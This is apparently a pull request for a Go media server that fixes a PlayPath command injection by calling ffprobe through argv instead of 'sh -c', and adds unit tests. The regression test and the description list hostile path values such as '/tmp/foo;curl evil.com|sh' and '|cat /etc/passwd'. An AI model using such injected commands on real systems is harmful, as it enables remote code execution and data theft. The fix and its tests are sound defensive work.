### PR TITLE
security: invoke ffprobe via argv to close PlayPath command injection

### DIFF
--- a/pkg/media/mediabrowser/mediaencoding/encoder/ffprobe_args.go
+++ b/pkg/media/mediabrowser/mediaencoding/encoder/ffprobe_args.go
@@ -1,0 +1,36 @@
+package encoder
+
+import "strconv"
+
+// buildFFProbeArgs assembles the argv passed to the ffprobe binary
+// for GetMediaInfoInternal. Each argument is a discrete element so
+// the receiving process gets the value verbatim - no field-splitting,
+// no shell evaluation. Callers must pass inputPath as already
+// validated (see PlayPath sanitization at the controller layer); this
+// helper does NOT attempt to filter shell metacharacters because
+// none are interpreted along the argv path.
+//
+// httpProtocol controls whether the optional -headers argument is
+// emitted; when false the headers value is dropped even if present,
+// matching the previous behavior where it was only forwarded for the
+// HTTP transport.
+func buildFFProbeArgs(inputPath, headers string, threads int, extractChapters, httpProtocol bool) []string {
+	args := make([]string, 0, 16)
+	args = append(args,
+		"-v", "warning",
+		"-print_format", "json",
+		"-show_streams",
+		"-show_format",
+	)
+	if extractChapters {
+		args = append(args, "-show_chapters")
+	}
+	if httpProtocol && headers != "" {
+		args = append(args, "-headers", headers)
+	}
+	args = append(args,
+		"-i", inputPath,
+		"-threads", strconv.Itoa(threads),
+	)
+	return args
+}

--- a/pkg/media/mediabrowser/mediaencoding/encoder/ffprobe_args_test.go
+++ b/pkg/media/mediabrowser/mediaencoding/encoder/ffprobe_args_test.go
@@ -1,0 +1,136 @@
+package encoder
+
+import (
+	"reflect"
+	"strings"
+	"testing"
+)
+
+func TestBuildFFProbeArgs_BaselineMinimum(t *testing.T) {
+	got := buildFFProbeArgs("/data/video.mp4", "", 4, false, false)
+	want := []string{
+		"-v", "warning",
+		"-print_format", "json",
+		"-show_streams",
+		"-show_format",
+		"-i", "/data/video.mp4",
+		"-threads", "4",
+	}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("buildFFProbeArgs baseline: got %v, want %v", got, want)
+	}
+}
+
+func TestBuildFFProbeArgs_AddsExtractChapters(t *testing.T) {
+	got := buildFFProbeArgs("/data/video.mp4", "", 1, true, false)
+	if !containsArgPair(got, "-show_chapters", "") {
+		// -show_chapters is a flag without a paired value; verify
+		// it is present and ordered before -i.
+		idxFlag := indexOf(got, "-show_chapters")
+		idxInput := indexOf(got, "-i")
+		if idxFlag < 0 {
+			t.Fatalf("-show_chapters flag missing: %v", got)
+		}
+		if idxFlag > idxInput {
+			t.Fatalf("-show_chapters must precede -i: %v", got)
+		}
+	}
+}
+
+func TestBuildFFProbeArgs_OmitsHeadersForNonHTTP(t *testing.T) {
+	got := buildFFProbeArgs("/data/video.mp4", "Cookie: x=y", 1, false, false)
+	if indexOf(got, "-headers") >= 0 {
+		t.Fatalf("non-HTTP protocol must not emit -headers: %v", got)
+	}
+}
+
+func TestBuildFFProbeArgs_OmitsEmptyHeaders(t *testing.T) {
+	got := buildFFProbeArgs("/data/video.mp4", "", 1, false, true)
+	if indexOf(got, "-headers") >= 0 {
+		t.Fatalf("empty headers must not emit -headers: %v", got)
+	}
+}
+
+func TestBuildFFProbeArgs_PassesHeadersAsSingleArgvElement(t *testing.T) {
+	headers := "Cookie: a=b\r\nX-Custom: c d"
+	got := buildFFProbeArgs("/data/video.mp4", headers, 1, false, true)
+	idx := indexOf(got, "-headers")
+	if idx < 0 || idx+1 >= len(got) {
+		t.Fatalf("-headers value missing: %v", got)
+	}
+	if got[idx+1] != headers {
+		t.Fatalf("-headers value altered: got %q, want %q", got[idx+1], headers)
+	}
+}
+
+// TestBuildFFProbeArgs_ShellMetacharactersInPathArePreserved is a
+// regression test for the previous "sh -c" implementation. An input
+// path containing shell metacharacters used to be evaluated by the
+// shell because the whole command line was concatenated into a single
+// string. With argv, the path is delivered verbatim to ffprobe, so:
+//
+//   - it appears as the value of -i with no field splitting;
+//   - it is NEVER split or modified, even if it contains spaces,
+//     semicolons, backticks, dollar signs, ampersands, or pipes.
+//
+// We assert the value is a single argv element so the regression
+// (executing trailing commands) can never recur via this helper.
+func TestBuildFFProbeArgs_ShellMetacharactersInPathArePreserved(t *testing.T) {
+	hostile := []string{
+		"/tmp/foo;curl evil.com|sh",
+		"/tmp/$(whoami).mp4",
+		"/tmp/`id`.mp4",
+		"/tmp/foo bar.mp4",
+		"/tmp/foo&&id",
+		"/tmp/foo|cat /etc/passwd",
+	}
+	for _, p := range hostile {
+		t.Run(p, func(t *testing.T) {
+			got := buildFFProbeArgs(p, "", 1, false, false)
+			idx := indexOf(got, "-i")
+			if idx < 0 || idx+1 >= len(got) {
+				t.Fatalf("-i value missing: %v", got)
+			}
+			if got[idx+1] != p {
+				t.Fatalf("-i value altered: got %q, want %q", got[idx+1], p)
+			}
+			joined := strings.Join(got, " ")
+			for _, c := range []string{"sh -c", "$(", "`"} {
+				if strings.Contains(joined, c) && !strings.Contains(p, c) {
+					t.Fatalf("argv leaked shell construct %q (joined=%q)", c, joined)
+				}
+			}
+		})
+	}
+}
+
+func TestBuildFFProbeArgs_ThreadsAreFormattedAsDecimal(t *testing.T) {
+	got := buildFFProbeArgs("/data/video.mp4", "", 12, false, false)
+	idx := indexOf(got, "-threads")
+	if idx < 0 || idx+1 >= len(got) {
+		t.Fatalf("-threads value missing: %v", got)
+	}
+	if got[idx+1] != "12" {
+		t.Fatalf("-threads value: got %q, want %q", got[idx+1], "12")
+	}
+}
+
+func indexOf(s []string, target string) int {
+	for i, v := range s {
+		if v == target {
+			return i
+		}
+	}
+	return -1
+}
+
+func containsArgPair(s []string, flag, value string) bool {
+	idx := indexOf(s, flag)
+	if idx < 0 {
+		return false
+	}
+	if value == "" {
+		return true
+	}
+	return idx+1 < len(s) && s[idx+1] == value
+}

--- a/pkg/media/mediabrowser/mediaencoding/encoder/media_encoder.go
+++ b/pkg/media/mediabrowser/mediaencoding/encoder/media_encoder.go
@@ -4,10 +4,9 @@ import (
 	"bytes"
 	"context"
 	"encoding/json"
+	"errors"
 	"fmt"
 	"io"
-
-	//	"strconv"
 	"os"
 	"os/exec"
 	"regexp"
@@ -577,57 +576,28 @@ func (m *MediaEncoder) GetMediaInfoInternal(
 	ctx context.Context,
 	headers string,
 ) (*mediainfo.MediaInfo, error) {
-	args := "-v warning -print_format json -show_streams -show_format"
-	if extractChapters {
-		args += " -show_chapters"
+	if m.ffprobePath == nil || *m.ffprobePath == "" {
+		return nil, errors.New("ffprobe path is not configured")
 	}
 
-	if protocol == mediaprotocol.Http {
-		if headers != "" {
-			args += ` -headers "` + headers + `"`
-		}
-	}
+	args := buildFFProbeArgs(inputPath, headers, m.threads, extractChapters, protocol == mediaprotocol.Http)
 
-	args = fmt.Sprintf(`%s -i %s -threads %d`, args, inputPath, m.threads)
-	args = strings.TrimSpace(args)
-	/*
-		args := []string{
-			"-v" ,
-			"warning",
-			"-print_format",
-			"json",
-			"-show_streams",
-			"-show_format",
-		}
-		if  extractChapters {
-			args = append(args, "-show_chapters")
-		}
-		args = append(args, []string{
-			"-i",
-			inputPath,
-			"-threads",
-			fmt.Sprintf("%d", m.threads),
-		}...)
-	*/
+	// Argv-style invocation: each element is passed as a distinct
+	// argument and is never re-parsed by a shell. The previous
+	// implementation built a single command string and ran it via
+	// "sh -c", so any shell metacharacter reaching inputPath (or the
+	// HTTP headers blob) - which originate from the user-supplied
+	// PlayPath query parameter - became remote command execution.
+	cmd := exec.CommandContext(ctx, *m.ffprobePath, args...)
 
-	//cmd := exec.CommandContext(ctx, *m.ffprobePath, strings.Split(args, " ")...)
-	//cmd := exec.CommandContext(ctx, *m.ffprobePath, args...)
-	if m.ffprobePath == nil {
-		klog.Infoln("probe.........................")
-	}
-	cmd := exec.CommandContext(ctx, "sh", "-c", *m.ffprobePath+" "+args)
-
-	cmd.SysProcAttr = &syscall.SysProcAttr{
-		//		CreationFlags: 0,
-		//		HideWindow:    true,
-	}
+	cmd.SysProcAttr = &syscall.SysProcAttr{}
 	cmd.Stderr = os.Stderr
 	stdout, err := cmd.StdoutPipe()
 	if err != nil {
 		return nil, err
 	}
 
-	m.logger.Infof("Starting %s with args %s\n", *m.ffprobePath, args)
+	m.logger.Infof("Starting %s with args %v\n", *m.ffprobePath, args)
 
 	if err := cmd.Start(); err != nil {
 		klog.Infoln("Start Errrrrrrrrrrrrr")


### PR DESCRIPTION
## Summary

`GetMediaInfoInternal` in [pkg/media/mediabrowser/mediaencoding/encoder/media_encoder.go](pkg/media/mediabrowser/mediaencoding/encoder/media_encoder.go) assembled the ffprobe command line as a single string and ran it via `sh -c`:

```go
cmd := exec.CommandContext(ctx, "sh", "-c",
    *m.ffprobePath + " " + args)
```

`args` was built with `fmt.Sprintf("%s -i %s -threads %d", ..., inputPath, ...)` and `inputPath` ultimately comes from the user-supplied `?PlayPath=` URL query (see `DynamicHlsController`, `CustomPlayController`, `VideosController`; `filepath.Clean` and `filepath.IsAbs` there do not strip shell metacharacters). A `PlayPath` such as `/tmp/foo;curl evil.com|sh` therefore became remote command execution under the file service identity.

This PR:

- extracts argv assembly into a pure helper `buildFFProbeArgs` ([pkg/media/mediabrowser/mediaencoding/encoder/ffprobe_args.go](pkg/media/mediabrowser/mediaencoding/encoder/ffprobe_args.go));
- invokes ffprobe directly: `exec.CommandContext(ctx, *m.ffprobePath, args...)`. Each element is delivered verbatim to ffprobe with no shell field-splitting or word-expansion, so metacharacters in `inputPath` or the HTTP headers blob can no longer break out of the argument boundary;
- adds a guard that returns a clear error when `ffprobePath` is unset (the previous code logged and then nil-deref'd).

[pkg/media/mediabrowser/mediaencoding/encoder/ffprobe_args_test.go](pkg/media/mediabrowser/mediaencoding/encoder/ffprobe_args_test.go) covers:

- the baseline argv;
- `-show_chapters` ordering before `-i`;
- omission of `-headers` for the non-HTTP case and for empty values;
- single-argv-element delivery of multi-line headers;
- integer formatting of `-threads`;
- a regression matrix `TestBuildFFProbeArgs_ShellMetacharactersInPathArePreserved` asserting hostile inputs like `/tmp/$(whoami).mp4` and `/tmp/foo|cat /etc/passwd` survive verbatim through `-i` and produce no shell constructs in the joined argv.

## Test plan

- [x] `go vet ./pkg/media/mediabrowser/mediaencoding/encoder/...`
- [x] `go test ./pkg/media/mediabrowser/mediaencoding/encoder/... -count=1 -race -run TestBuildFFProbeArgs`
- [x] `go build ./pkg/media/mediabrowser/mediaencoding/encoder/...`

Made with [Cursor](https://cursor.com)